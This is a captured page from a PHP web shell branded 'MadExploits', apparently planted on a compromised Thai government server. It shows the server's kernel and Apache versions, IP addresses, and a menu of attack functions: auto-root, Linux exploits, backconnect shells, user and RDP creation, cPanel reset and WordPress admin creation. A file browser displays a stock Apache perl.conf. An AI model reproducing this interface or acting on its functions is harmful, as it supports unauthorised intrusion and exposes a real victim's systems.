Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
httpd /
conf.d /
[ HOME SHELL ]
Name
Size
Permission
Action
README
392
B
-rw-r--r--
manual.conf
295
B
-rw-r--r--
perl.conf
1.75
KB
-rw-r--r--
php.conf
1.45
KB
-rw-r--r--
phpMyAdmin.conf
1.73
KB
-rw-r--r--
ssl.conf
9.34
KB
-rw-r--r--
webalizer.conf
352
B
-rw-r--r--
welcome.conf
299
B
-rw-r--r--
wsgi.conf
43
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : perl.conf
# # Mod_perl incorporates a Perl interpreter into the Apache web server, # so that the Apache web server can directly execute Perl code. # Mod_perl links the Perl runtime library into the Apache web server # and provides an object-oriented Perl interface for Apache's C # language API. The end result is a quicker CGI script turnaround # process, since no external Perl interpreter has to be started. # LoadModule perl_module modules/mod_perl.so # Uncomment this line to globally enable warnings, which will be # written to the server's error log. Warnings should be enabled # during the development process, but should be disabled on a # production server as they affect performance. # #PerlSwitches -w # Uncomment this line to enable taint checking globally. When Perl is # running in taint mode various checks are performed to reduce the # risk of insecure data being passed to a subshell or being used to # modify the filesystem. Unfortunately many Perl modules are not # taint-safe, so you should exercise care before enabling it on a # production server. # #PerlSwitches -T # This will allow execution of mod_perl to compile your scripts to # subroutines which it will execute directly, avoiding the costly # compile process for most requests. # #Alias /perl /var/www/perl #<Directory /var/www/perl> # SetHandler perl-script # PerlResponseHandler ModPerl::Registry # PerlOptions +ParseHeaders # Options +ExecCGI #</Directory> # This will allow remote server configuration reports, with the URL of # http://servername/perl-status # Change the ".example.com" to match your domain to enable. # #<Location /perl-status> # SetHandler perl-script # PerlResponseHandler Apache2::Status # Order deny,allow # Deny from all # Allow from .example.com #</Location>
Close